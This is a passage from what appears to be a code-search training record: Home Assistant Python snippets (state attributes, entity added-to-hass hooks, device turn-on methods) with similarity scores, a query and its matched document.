attr[\"percent_complete\"] = 0\n\n next = self._zone.runs.next_run\n if next is not None:\n if next.schedule is not None:\n attr[\"next_schedule\"] = next.schedule.schedule_index + 1\n attr[\"next_name\"] = next.schedule.name\n else:\n attr[\"next_schedule\"] = RES_MANUAL\n attr[\"next_name\"] = RES_MANUAL\n attr[\"next_start\"] = dt.as_local(next.start_time)\n attr[\"next_duration\"] = str(next.duration)\n else:\n attr[\"next_schedule\"] = RES_NONE\n\n return attr", "def extra_state_attributes(self):\n attrs = {\n ATTR_NODE_ID: self.node_id,\n ATTR_NODE_NAME: self._name,\n ATTR_MANUFACTURER_NAME: self._manufacturer_name,\n ATTR_PRODUCT_NAME: self._product_name,\n }\n attrs.update(self._attributes)\n if self.battery_level is not None:\n attrs[ATTR_BATTERY_LEVEL] = self.battery_level\n if self.wakeup_interval is not None:\n attrs[ATTR_WAKEUP] = self.wakeup_interval\n if self._application_version is not None:\n attrs[ATTR_APPLICATION_VERSION] = self._application_version\n\n return attrs", "def extra_state_attributes(self):\n attr = self._attributes\n if self.tesla_device.has_battery():\n attr[ATTR_BATTERY_LEVEL] = self.tesla_device.battery_level()\n attr[ATTR_BATTERY_CHARGING] = self.tesla_device.battery_charging()\n return attr", "def state_attributes(self) -> Dict[str, Any]:\n return {**super(WarmupThermostat, self).state_attributes, **self.attributes}", "def device_state_attributes(self):\n attributes = {}\n\n if self._type == \"weather\":\n attributes[\"data\"] = self._connector.get_condition_hourly()\n elif self._type == \"weather_report\":\n attributes[\"data\"] = self._connector.get_weather_report()\n elif self._type == \"temperature\":\n attributes[\"data\"] = self._connector.get_temperature_hourly()\n elif self._type == \"dewpoint\":\n attributes[\"data\"] = self._connector.get_dewpoint_hourly()\n elif self._type == \"pressure\":\n attributes[\"data\"] = self._connector.get_pressure_hourly()\n elif self._type == \"wind_speed\":\n attributes[\"data\"] = self._connector.get_wind_speed_hourly()\n elif self._type == \"wind_direction\":\n attributes[\"data\"] = self._connector.get_wind_direction_hourly()\n elif self._type == \"wind_gusts\":\n attributes[\"data\"] = self._connector.get_wind_gusts_hourly()\n elif self._type == \"precipitation\":\n attributes[\"data\"] = self._connector.get_precipitation_hourly()\n elif self._type == \"precipitation_probability\":\n attributes[\"data\"] = self._connector.get_precipitation_probability_hourly()\n elif self._type == \"precipitation_duration\":\n attributes[\"data\"] = self._connector.get_precipitation_duration_hourly()\n elif self._type == \"cloud_coverage\":\n attributes[\"data\"] = self._connector.get_cloud_coverage_hourly()\n elif self._type == \"visibility\":\n attributes[\"data\"] = self._connector.get_visibility_hourly()\n elif self._type == \"sun_duration\":\n attributes[\"data\"] = self._connector.get_sun_duration_hourly()\n elif self._type == \"sun_irradiance\":\n attributes[\"data\"] = self._connector.get_sun_irradiance_hourly()\n elif self._type == \"fog_probability\":\n attributes[\"data\"] = self._connector.get_fog_probability_hourly()\n elif self._type == \"humidity\":\n attributes[\"data\"] = self._connector.get_humidity_hourly()\n\n attributes[ATTR_ISSUE_TIME] = self._connector.infos[ATTR_ISSUE_TIME]\n attributes[ATTR_LATEST_UPDATE] = self._connector.infos[ATTR_LATEST_UPDATE]\n attributes[ATTR_STATION_ID] = self._connector.infos[ATTR_STATION_ID]\n attributes[ATTR_STATION_NAME] = self._connector.infos[ATTR_STATION_NAME]\n attributes[ATTR_ATTRIBUTION] = ATTRIBUTION\n return attributes", "def state(self) -> 'outputs.DeviceStateResponse':\n return pulumi.get(self, \"state\")" ]
[ "0.93173087", "0.9245708", "0.92207897", "0.92147964", "0.92147964", "0.9210798", "0.9210798", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91441494", "0.9104897", "0.90553176", "0.90515023", "0.90515023", "0.9017299", "0.892098", "0.88845754", "0.88437164", "0.875476", "0.8743821", "0.8669118", "0.8628668", "0.86186224", "0.86186224", "0.85022706", "0.8455415", "0.84483206", "0.8444541", "0.8440318", "0.84394234", "0.8429921", "0.8423787", "0.84181386", "0.8404023", "0.8394754", "0.8366419", "0.83540905", "0.83512175", "0.8344845", "0.8341148", "0.83178765", "0.8315584", "0.8298955", "0.82813984", "0.8257902", "0.8250856", "0.82310456", "0.8228878", "0.82233864", "0.82030797", "0.8192418", "0.81884867", "0.81231606", "0.8110774", "0.808144", "0.80749196", "0.80317736", "0.7985119", "0.7985119", "0.79694945", "0.7952288", "0.79385823", "0.79113895", "0.78787047", "0.7814134", "0.78067756", "0.77751815", "0.7763412", "0.7730652", "0.77212334", "0.76967883", "0.7659658", "0.763762", "0.7582756", "0.7571003", "0.75672853", "0.755491", "0.74775344", "0.745957", "0.74076897", "0.73887604", "0.73883766", "0.7329229", "0.73167735", "0.72690624", "0.72610897", "0.72609174", "0.71374214" ]
0.8087728
66
When entity is added to hass.
async def async_added_to_hass(self): self.async_on_remove( self.coordinator.async_add_listener(self.async_write_ha_state) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def async_added_to_hass(self):\n self.hass.data[DOMAIN].add_entity_id(self.entity_id)\n self.hass.data[DOMAIN].add_sensor(self)", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n self.coordinator.entities.append(self)", "async def async_added_to_hass(self):\n self.hass.data[DOMAIN][\"entities\"][\"fan\"].append(self)", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n if DOMAIN not in self.hass.data:\n self.hass.data[DOMAIN] = {}\n if SENSOR_PLATFORM not in self.hass.data[DOMAIN]:\n self.hass.data[DOMAIN][SENSOR_PLATFORM] = {}\n self.hass.data[DOMAIN][SENSOR_PLATFORM][self.entity_id] = self\n\n if self._calendar:\n if CALENDAR_PLATFORM not in self.hass.data[DOMAIN]:\n self.hass.data[DOMAIN][CALENDAR_PLATFORM] = EntitiesCalendarData(self.hass)\n _LOGGER.debug(\"Creating fkfgarbage_collection calendar \" + self._name)\n self.hass.async_create_task(\n async_load_platform(\n self.hass,\n CALENDAR_PLATFORM,\n DOMAIN,\n {\"name\": CALENDAR_NAME},\n {\"name\": CALENDAR_NAME},\n )\n )\n self.hass.data[DOMAIN][CALENDAR_PLATFORM].add_entity(self.entity_id)", "async def async_added_to_hass(self):\n # Sensors should also register callbacks to HA when their state changes\n if self._product is not None:\n self._product.register_callback(self.async_write_ha_state)", "async def async_added_to_hass(self):\n # Sensors should also register callbacks to HA when their state changes\n if self._product is not None:\n self._product.register_callback(self.async_write_ha_state)", "async def async_added_to_hass(self):\n\n def gpio_edge_listener(port):\n \"\"\"Update GPIO when edge change is detected.\"\"\"\n self.schedule_update_ha_state(True)\n\n def setup_entity():\n setup_input(self._port)\n edge_detect(self._port, gpio_edge_listener)\n self.schedule_update_ha_state(True)\n\n await self.hass.async_add_executor_job(setup_entity)", "async def async_added_to_hass(self) -> None:\n self._table.add_listener(self.async_write_ha_state)", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n # Sensors should also register callbacks to HA when their state changes\n if self._product is not None:\n self._product.register_callback(self.async_write_ha_state)", "async def async_added_to_hass(self) -> None:\n self._nobo.register_callback(self._after_update)", "async def async_added_to_hass(self):\n self._attr_image_last_updated = dt_util.utcnow()", "def on_entity_update(self, event):\n self.entity.on_entity_update(event)", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n async_track_state_change_event(\n self.hass,\n [self._source_entity_id],\n self._async_compensation_sensor_state_listener,\n )\n )", "async def async_added_to_hass(self):\n self._device.register_update_callback(self.async_schedule_update_ha_state)", "async def async_added_to_hass(self):\n self.coordinator.async_add_listener(self.async_write_ha_state)", "def addEntity (self, entity):\n if entity in self:\n raise RuntimeError(\"Entity exists\")\n self.add(entity)\n self.log.info(str(entity) + \" joined\")\n self.raiseEvent(EntityJoin, entity)", "async def async_added_to_hass(self):\n self.async_on_remove(\n self._coordinator.async_add_listener(self.async_write_ha_state)\n )\n self.update_state()", "async def async_added_to_hass(self):\n self._coordinator.add_dahua_event_listener(self._event_name, self.async_write_ha_state)", "async def async_added_to_hass(self) -> None:\n self._client.set_callback(self.schedule_update_ha_state)\n self.hass.data[DOMAIN][self._entry_id].clients.append(self)", "async def async_added_to_hass(self):\n _LOGGER.debug(\n \"New switch %s (%s %s)\",\n self._inst,\n self._sid_data[\"sid\"],\n self._data[self._sid_data[\"sid_uid\"]],\n )", "async def async_added_to_hass(self):\n self._car.add_update_listener(self.update_callback)", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self._coordinator.async_add_listener(self.async_write_ha_state)\n )", "async def async_added_to_hass(self) -> None:\n self._async_setup(self.entity_id)\n\n self._cast_view_remove_handler = async_dispatcher_connect(\n self.hass, SIGNAL_HASS_CAST_SHOW_VIEW, self._handle_signal_show_view\n )", "def on_add(self):\n self.notify(on_add())", "async def async_added_to_hass(self):\n self.async_on_remove(self.wrapper.async_add_listener(self._update_callback))", "def on_insert(self) -> None:", "async def async_added_to_hass(self):\n await self.coordinator.add_key(self._key, self._typeconf)\n await super().async_added_to_hass()", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n\n def on_state_changed():\n self.schedule_update_ha_state()\n\n for service in self._device.device_services:\n service.subscribe_callback(self.entity_id, on_state_changed)", "async def async_added_to_hass(self):\n\n self._undo_dispatcher = async_dispatcher_connect(\n self.hass,\n SIGNAL_TADO_UPDATE_RECEIVED.format(\"device\", self.device_id),\n self._async_update_callback,\n )\n self._async_update_device_data()", "async def async_added_to_hass(self):\n self.async_on_remove(self.coordinator.async_add_listener(self.refresh))", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self._handle_coordinator_update()", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_on_remove(\n self.coordinator.start_fetch_data(self.module_id, self.data_id)\n )", "def add_entity(self, entity):\n self.append(entity)\n if self.size > 0:\n self.sort()", "async def async_added_to_hass(self):\n async_dispatcher_connect(\n self.hass,\n SERVICE_SET_MODE_SIGNAL.format(self.entity_id),\n self.set_mode\n )", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n\n old_state = await self.async_get_last_state()\n if old_state is not None:\n self._state = old_state.state == STATE_ON\n\n def _handle_event(event):\n \"\"\"Check if event applies to me and update.\"\"\"\n if event.device.id_string != self._event.device.id_string:\n return\n\n self.apply_event(event)\n\n self.async_on_remove(\n self.hass.helpers.dispatcher.async_dispatcher_connect(\n SIGNAL_EVENT, _handle_event\n )\n )", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass,\n f\"{ANTHEMAV_UPDATE_SIGNAL}_{self._entry_id}\",\n self.update_states,\n )\n )", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._cluster_handler, SIGNAL_ATTR_UPDATED, self.async_set_state\n )", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self._update_from_rest_data()\n if self._coordinator:\n self.async_on_remove(\n self._coordinator.async_add_listener(self._handle_coordinator_update)\n )", "async def async_added_to_hass(self):\n async_dispatcher_connect(self.hass, DOMAIN, self._refresh)", "def _during_execute(self, db, entity):\n pass", "def OnAdd(self, controller):\n pass", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self._coordinator.async_add_listener(self._update_callback)\n )\n self._update_callback()", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n state = await self.async_get_last_state()\n if state:\n self._state = state.state\n\n #TEST info\n try:\n if 'typeCompteur' in state.attributes:\n self.attrs = state.attributes\n _LOGGER.info(\"Redemarrage avec element present ??\")\n except:\n _LOGGER.info(\"Redemarrage mais rien de present\")\n pass\n\n @callback\n def update():\n \"\"\"Update state.\"\"\"\n self._update_state()\n self.async_write_ha_state()\n\n self.async_on_remove(self.coordinator.async_add_listener(update))\n self._update_state()\n if not state:\n return", "def add_entities(entities, async_add_entities, hass):\n async_add_entities(entities)", "def _after_execute(self, db, entity):\n pass", "def _after_execute(self, db, entity):\n pass", "async def async_added_to_hass(self):\n\n async def async_update_state():\n \"\"\"Update sensor state.\"\"\"\n await self.async_update_ha_state(False)\n\n async_dispatcher_connect(self.hass, \"WiserSmartUpdateMessage\", async_update_state)", "def add_entity(self, entity_id):\n if entity_id not in self.entities:\n self.entities.append(entity_id)", "def add_ent(self, item: 'Entity') -> None:\n self.entities.append(item)\n self.by_class[item['classname', ''].casefold()].add(item)\n self.by_target[item['targetname', ''].casefold() or None].add(item)\n if 'nodeid' in item:\n try:\n node_id = int(item['nodeid'])\n except (TypeError, ValueError):\n pass\n else:\n item['nodeid'] = str(self.node_id.get_id(node_id))", "async def async_added_to_hass(self):\n\n self._undo_dispatcher = async_dispatcher_connect(\n self.hass,\n SIGNAL_TADO_UPDATE_RECEIVED.format(\"zone\", self.zone_id),\n self._async_update_callback,\n )\n self._async_update_zone_data()", "def add_entity(self, ent):\n self.tiles[ent.position[x]][ent.position[y]].add_entity(ent)", "def process_IN_CREATE(self, event):", "async def async_added_to_hass(self):\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass,\n self._router.signal_device_update,\n self.async_update_device,\n )\n )", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._cover_cluster_handler, SIGNAL_ATTR_UPDATED, self.async_set_position\n )", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(start.async_at_start(self.hass, self._async_start))", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n\n # Add listener\n async_track_state_change(\n self.hass, self.temperature_sensor_entity_id, self._async_temperature_sensor_changed\n )\n async_track_state_change(\n self.hass, self.humidity_sensor_entity_id, self._async_humidity_sensor_changed\n )\n\n @callback\n def _async_startup(event):\n \"\"\"Init on startup.\"\"\"\n sensor_state_temperature = self.hass.states.get(self.temperature_sensor_entity_id)\n if sensor_state_temperature and sensor_state_temperature.state != STATE_UNKNOWN:\n self._async_update_temperature(sensor_state_temperature)\n\n sensor_state_humidity = self.hass.states.get(self.humidity_sensor_entity_id)\n if sensor_state_humidity and sensor_state_humidity.state != STATE_UNKNOWN:\n self._async_update_humidity(sensor_state_humidity)\n\n self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, _async_startup)", "async def async_internal_added_to_hass(self) -> None:\n await super().async_internal_added_to_hass()\n if not self.registry_entry:\n return\n self._async_read_entity_options()\n self._update_suggested_precision()", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self.coordinator.async_add_listener(self._refresh_from_coordinator)\n )", "async def async_added_to_hass(self) -> None:\n self._group.set_callback(self.schedule_update_ha_state)\n self.hass.data[DOMAIN][self._entry_id].groups.append(self)", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._on_off_cluster_handler,\n SIGNAL_ATTR_UPDATED,\n self.async_set_open_closed,\n )\n self.async_accept_signal(\n self._level_cluster_handler, SIGNAL_SET_LEVEL, self.async_set_level\n )", "def after_put(self, *args, **kwargs):\n # Override this method in inheriting models.\n pass", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._on_off_cluster_handler, SIGNAL_ATTR_UPDATED, self.async_set_state\n )", "async def async_added_to_hass(self):\n self._unsub_dispatcher = async_dispatcher_connect(\n self.hass, SERVICE_UPDATE, self.async_write_ha_state\n )", "async def async_added_to_hass(self):\r\n if self.hass.is_running:\r\n await self._initialize()\r\n else:\r\n self.hass.bus.async_listen_once(\r\n EVENT_HOMEASSISTANT_STARTED, self._initialize\r\n )\r\n\r\n self._update_state()", "def onAddEnemy(self, entityID):\n\t\tAI.onAddEnemy(self, entityID)\n\t\tCombat.onAddEnemy(self, entityID)", "def on_join(self, event):\n con = self.connection\n em = self.server.entity_manager\n self.entity.init(con.entity_id, con.entity_data, em)\n self.server.entity_list[self.entity.id] = self.entity", "async def async_added_to_opp(self):\n self.opp.data[DOMAIN][\"entities\"][\"scene\"].append(self)", "def add(self, entity):\n self.entities.add(entity)\n return entity", "async def async_added_to_hass(self) -> None:\n if not (last_state := await self.async_get_last_state()):\n return\n self._attr_is_on = last_state.state == STATE_ON\n\n if self._attr_is_on:\n evt.async_call_later(self.hass, OFF_DELAY, self.off_delay_listener)", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_on_remove(\n self._version_coordinator.async_add_listener(\n self._handle_coordinator_update, self.coordinator_context\n )\n )\n self.update_from_latest_data()", "def add_event(self, event):\r\n return super().insert_event(event)", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, self.disconnect)\n )", "async def async_added_to_hass(self):\n self._device.set_update_callback(self._update)\n self.hass.bus.async_listen(\n EVENT_HDMI_CEC_UNAVAILABLE, self._hdmi_cec_unavailable\n )", "async def async_added_to_hass(self):\n # If not None, we got an initial value.\n await super().async_added_to_hass()\n state = await self.async_get_last_state()\n if not state:\n return\n self._state = state.state == \"on\"", "def __init__(self, hass, name, device, should_poll=False):\n self.hass = hass\n self._name = name\n self._device = device\n self._should_poll = should_poll\n if not should_poll:\n self._device.update_entities.append(self)", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._cluster_handler, SIGNAL_ARMED_STATE_CHANGED, self.async_set_armed_mode\n )\n self.async_accept_signal(\n self._cluster_handler, SIGNAL_ALARM_TRIGGERED, self.async_alarm_trigger\n )", "def _before_execute(self, db, entity):\n pass", "def _before_execute(self, db, entity):\n pass", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n if self._battery_cluster_handler:\n self.async_accept_signal(\n self._battery_cluster_handler,\n SIGNAL_ATTR_UPDATED,\n self.async_battery_percentage_remaining_updated,\n )", "def after_insert(self, obj, st):\n pass", "def after_update(self, obj, st):\n pass", "async def added(self, value):\n pass", "async def async_added_to_hass(self):\n # If not None, we got an initial value.\n await super().async_added_to_hass()\n if self._state is not None:\n return\n\n state = await self.async_get_last_state()\n self._state = state and state.state == STATE_ON", "async def async_added_to_hass(self):\n self._async_update_current_cover_position()\n self.async_on_remove(\n self.coordinator.async_add_listener(self._async_update_shade_from_group)\n )", "async def async_setup_entry(\n hass: HomeAssistantType, config_entry: ConfigType, async_add_entities\n):\n entities_to_create = hass.data[DATA_AMPIO][alarm.DOMAIN]\n\n unsub = async_dispatcher_connect(\n hass,\n SIGNAL_ADD_ENTITIES,\n functools.partial(\n discovery.async_add_entities,\n async_add_entities,\n entities_to_create,\n AmpioSatelAlarmControlPanel,\n ),\n )\n hass.data[DATA_AMPIO][DATA_AMPIO_DISPATCHERS].append(unsub)", "def __init__(self, hass, integration_name, entity):\n super().__init__(hass, integration_name, entity)\n\n self._last_alert = None", "def add_entity(self, entity_obj):\n if (\n type(entity_obj) is not dict\n or \"entity_id\" not in entity_obj\n or \"mentions\" not in entity_obj\n ):\n raise ValueError(\n \"The input to update_entity needs to be a dictionary with an entity_id key and mentions key as \"\n \"you are replacing the entity information in bulk.\"\n )\n try:\n ent = EntityObj(\n entity_id=entity_obj[\"entity_id\"],\n mentions=entity_obj[\"mentions\"],\n title=entity_obj.get(\"title\", entity_obj[\"entity_id\"]),\n description=entity_obj.get(\"description\", \"\"),\n types=entity_obj.get(\"types\", {}),\n relations=entity_obj.get(\"relations\", []),\n )\n except ValidationError as e:\n print(e.json())\n raise e\n # We assume this is a new entity\n if self._entity_symbols.qid_exists(ent.entity_id):\n raise ValueError(\n f\"The entity {ent.entity_id} already exists. Please call update_entity instead.\"\n )\n # Add type systems of type_sys -> QID -> list of type names\n for type_sys in ent.types:\n if type_sys not in self._type_systems:\n raise ValueError(\n f\"Error {entity_obj}. When adding a new entity, you must use the same type system. \"\n f\"We don't support new type systems.\"\n )\n # Add kg relations QID -> relation -> list of object QIDs\n parsed_rels = {}\n for rel_pair in ent.relations:\n if \"relation\" not in rel_pair or \"object\" not in rel_pair:\n raise ValueError(\n \"For each value in relations, it must be a JSON with keys relation and object\"\n )\n if (\n self._kg_symbols is not None\n and rel_pair[\"relation\"] not in self._kg_symbols.get_all_relations()\n ):\n raise ValueError(\n f\"Error {entity_obj}. When adding a new entity, you must use the same set of relations. \"\n f\"We don't support new relations.\"\n )\n if rel_pair[\"relation\"] not in parsed_rels:\n parsed_rels[rel_pair[\"relation\"]] = []\n parsed_rels[rel_pair[\"relation\"]].append(rel_pair[\"object\"])\n # Lower case mentions for mention extraction\n mentions = [\n [get_lnrm(men[0], strip=True, lower=True), men[1]] for men in ent.mentions\n ]\n self._entity_symbols.add_entity(\n ent.entity_id, mentions, ent.title, ent.description\n )\n for type_sys in self._type_systems:\n self._type_systems[type_sys].add_entity(\n ent.entity_id, ent.types.get(type_sys, [])\n )\n if self._kg_symbols is not None:\n self._kg_symbols.add_entity(ent.entity_id, parsed_rels)", "async def async_setup_entry(hass, config_entry, async_add_entities):\n scenes = []\n bridge = hass.data[DOMAIN]\n\n for event in bridge.devices[\"scene\"]:\n entity = HomeSeerScene(event)\n scenes.append(entity)\n _LOGGER.info(f\"Added HomeSeer event: {entity.name}\")\n\n if scenes:\n async_add_entities(scenes)", "def _connect_events(self, entity):\n for event_json in self.entity_json['events']:\n event_id = event_json['id']\n event_verb = event_json['verb']\n event = self.world.events[event_id]\n entity.events.add(event_verb, event)", "def _add_full_entity(self, entity):\n marked_id = utils.get_peer_id(\n utils.get_input_peer(entity, allow_self=False), add_mark=True\n )\n try:\n old_entity = self._entities[marked_id]\n old_entity.__dict__.update(entity.__dict__) # Keep old references\n\n # Update must delete old username and phone\n username = getattr(old_entity, 'username', None)\n if username:\n del self._username_id[username.lower()]\n\n phone = getattr(old_entity, 'phone', None)\n if phone:\n del self._phone_id[phone]\n except KeyError:\n # Add new entity\n self._entities[marked_id] = entity\n\n # Always update username or phone if any\n username = getattr(entity, 'username', None)\n if username:\n self._username_id[username.lower()] = marked_id\n\n phone = getattr(entity, 'phone', None)\n if phone:\n self._username_id[phone] = marked_id", "def add_np_entity(self, entity):\n if entity._type == Genre.HUMAN:\n self._entities['humans'].append(entity)\n\n elif entity._type == Genre.COP:\n self._entities['cops'].append(entity)\n\n elif entity._type == Genre.BERZERK:\n self._entities['berzerks'].append(entity)\n\n if entity not in self._entities['all']:\n self._entities['all'].append(entity)", "def cli(ctx, entity, params={}):\n return ctx.gi.entity.add_entity(entity, params=params)", "def add_new_entry(self, ent):\n ent.inserted = time.strftime(\"%D\")\n ent = self.add_entry(ent)\n if ent is not None:\n self.modified_collection = True\n return ent", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigType, async_add_entities\n) -> None:\n hass_data = hass.data[DOMAIN][entry.entry_id]\n\n async_add_entities(\n [\n MetOfficeCurrentSensor(entry.data, hass_data, sensor_type)\n for sensor_type in SENSOR_TYPES\n ],\n False,\n )" ]
[ "0.79615426", "0.7715403", "0.73743874", "0.72151524", "0.69275665", "0.69275665", "0.6916353", "0.6870173", "0.6820395", "0.6781351", "0.6752743", "0.6735904", "0.67260987", "0.67226434", "0.67097443", "0.6699443", "0.66656816", "0.6656795", "0.66509074", "0.6563511", "0.6549902", "0.65494496", "0.6533467", "0.6529362", "0.6512587", "0.649037", "0.64617395", "0.64587045", "0.6454905", "0.6448177", "0.6433255", "0.6423828", "0.64149404", "0.64125025", "0.64031637", "0.640219", "0.637394", "0.6365229", "0.6363184", "0.6359675", "0.63426816", "0.63303906", "0.63120145", "0.6306652", "0.6284313", "0.6284313", "0.6281969", "0.62609947", "0.62466097", "0.6235621", "0.6232268", "0.62206507", "0.62195605", "0.62152433", "0.6205613", "0.62004745", "0.61907756", "0.61608577", "0.61590505", "0.6146812", "0.6140945", "0.612921", "0.61157066", "0.6114553", "0.61070055", "0.6095251", "0.6073931", "0.6055812", "0.6028941", "0.60231584", "0.60189795", "0.600916", "0.6007534", "0.60044897", "0.59638035", "0.59618944", "0.5958373", "0.5958373", "0.5957683", "0.5926142", "0.5918641", "0.5887051", "0.58765584", "0.58720714", "0.5858857", "0.58557874", "0.58502305", "0.5848605", "0.5839499", "0.58232737", "0.5819607", "0.5816266", "0.58060265", "0.57976633" ]
0.66790694
20
Turn the device on.
async def async_turn_on(self, **kwargs): if self._switch_type == "record_motion": _LOGGER.debug("Turning on Motion Detection") await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_MOTION) elif self._switch_type == "record_always": _LOGGER.debug("Turning on Constant Recording") await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_ALLWAYS) else: _LOGGER.debug("Turning on IR") await self.upv.set_camera_ir(self._camera_id, self._ir_on_cmd) await self.coordinator.async_request_refresh()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def turn_on(self, **kwargs):\n self._state = True\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device,'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":1 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":1 }', 5)", "def turn_on(self, **kwargs):\n self.smartplug.turn_on()", "def turn_on(self, **kwargs) -> None:\n self._device.writeCharacteristic(self._handle, b'\\x00', True)\n self._state = True\n self.schedule_update_ha_state()", "def _turn_on_dev_mode(self):\n if self._device is not None:\n self._char_write(self._BLE_SERVICE_ANTI_DOS,\n [ord(c) for c in self._ANTI_DOS_MESSAGE])\n self._char_write(self._BLE_SERVICE_TX_POWER,\n [self._TX_POWER_VALUE])\n # Sending 0x01 to the wake service wakes the sphero.\n self._char_write(self._BLE_SERVICE_WAKE, [0x01])", "def on(config: dict):\n switch_device(config, config[\"inching\"], \"on\")", "def force_switch_on(self):\n self.turn_on_modem()", "def turn_on(self, **kwargs):\n self._is_on = True", "def turn_on(self):\n self._remote.power(1)", "def enable(self):\n # Netmiko reports enable and config mode as being enabled\n if not self.native.check_enable_mode():\n self.native.enable()\n # Ensure device is not in config mode\n if self.native.check_config_mode():\n self.native.exit_config_mode()\n\n log.debug(\"Host %s: Device enabled.\", self.host)", "async def async_turn_on(self, **kwargs):\n try:\n if await self._api.set_relay_state(self._dev_id, \"on\"):\n self._is_on = True\n self.async_write_ha_state()\n except Smile.PlugwiseError:\n _LOGGER.error(\"Error while communicating to device\")", "def turn_on(self, **kwargs):\n set_sonoff_state(self._host, \"on\")\n self._state = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self._client.turn_on(self._device_port)", "def turn_on(self, **kwargs):\n self._is_on = True\n self.schedule_update_ha_state()\n self.hass.data[ZIGATE_DOMAIN].action_onoff(self._device.addr,\n self._endpoint,\n 1)", "def turn_on(self):\n GPIO.output(self.gpio, True) # turn on light", "def turn_on(self, **kwargs):\n self._send_command(\"turn_on\")", "def turn_on(self, **kwargs: Any) -> None:\n with self._wemo_call_wrapper(\"turn on\"):\n self.wemo.on()", "def turn_on(self):\n self._interrupt_flash()\n if not self.on:\n GPIO.output(self.pin, GPIO.HIGH)\n self.on = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n _LOGGER.debug(\"Tried to switch on %s\", self.name)\n try:\n await self.hass.async_add_executor_job(\n self.device.appliance.set_setting, BSH_POWER_STATE, BSH_POWER_ON\n )\n except HomeConnectError as err:\n _LOGGER.error(\"Error while trying to turn on device: %s\", err)\n self._state = False\n self.async_entity_update()", "def _turn_on(self):\n self._turn_display('ON')", "def turn_on(self):\n self._state = True\n self.write_state(bytes([9]))\n self.schedule_update_ha_state()", "def ON(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.PIN, GPIO.OUT)\n GPIO.output(self.PIN, True)\n self.STATUS = \"ON\"", "def turn_on_modem(self):\n if not self.is_power_on():\n self._logger.debug(\"Switching modem on...\")\n self.set_pin()\n # give modem some time to login\n time.sleep(10)\n else:\n self._logger.debug(\"Modem is already powered on...\")", "async def async_turn_on(self):\n path = \"/interface\"\n param = \"default-name\"\n if \"-\" in self._data[\"port-mac-address\"]:\n param = \"name\"\n value = self._data[param]\n mod_param = \"disabled\"\n mod_value = False\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n\n if self._data[\"poe-out\"] == \"off\":\n path = \"/interface/ethernet\"\n self._ctrl.set_value(path, param, value, \"poe-out\", \"auto-on\")\n\n await self._ctrl.force_update()", "def turn_on(self, **kwargs: Any) -> None:\n self._set_light(ON_STATE)", "async def async_turn_on(self, **kwargs):\n try:\n state_on = await self._api.set_relay_state(\n self._dev_id, self._members, \"on\"\n )\n if state_on:\n self._is_on = True\n self.async_write_ha_state()\n except PlugwiseException:\n _LOGGER.error(\"Error while communicating to device\")", "def on(self):\n self.state = \"ON\"\n logger.info(\"Turning on %s lamp at %s port %s plug %s\" % (self.name,\n self.host,\n self.port,\n self.plug))\n return self.send_cmd(\"pset %s 1\" % self.plug)", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, True)", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, True)", "def turnOn(self, deviceID):\r\n\r\n return self._performAction(deviceID, _API_DEVICE_ACTION_TURN_ON)", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n self._previous_mic_level = self.device.mic_volume\n self._previous_record_mode = self.device.recording_settings.mode\n await self.device.set_privacy(True, 0, RecordingMode.NEVER)", "def turn_on(self):\n self._lms.query(self._id, 'power', '1')\n self.update_ha_state()", "def turn_on(self) -> None:\n self._state = self._player.turn_on()", "def turn_on(self) -> None:\n self._monoprice.set_power(self._zone_id, True)", "def setOn(self, command):\r\n self.setDriver('ST', 1)", "def turn_on(self):\n 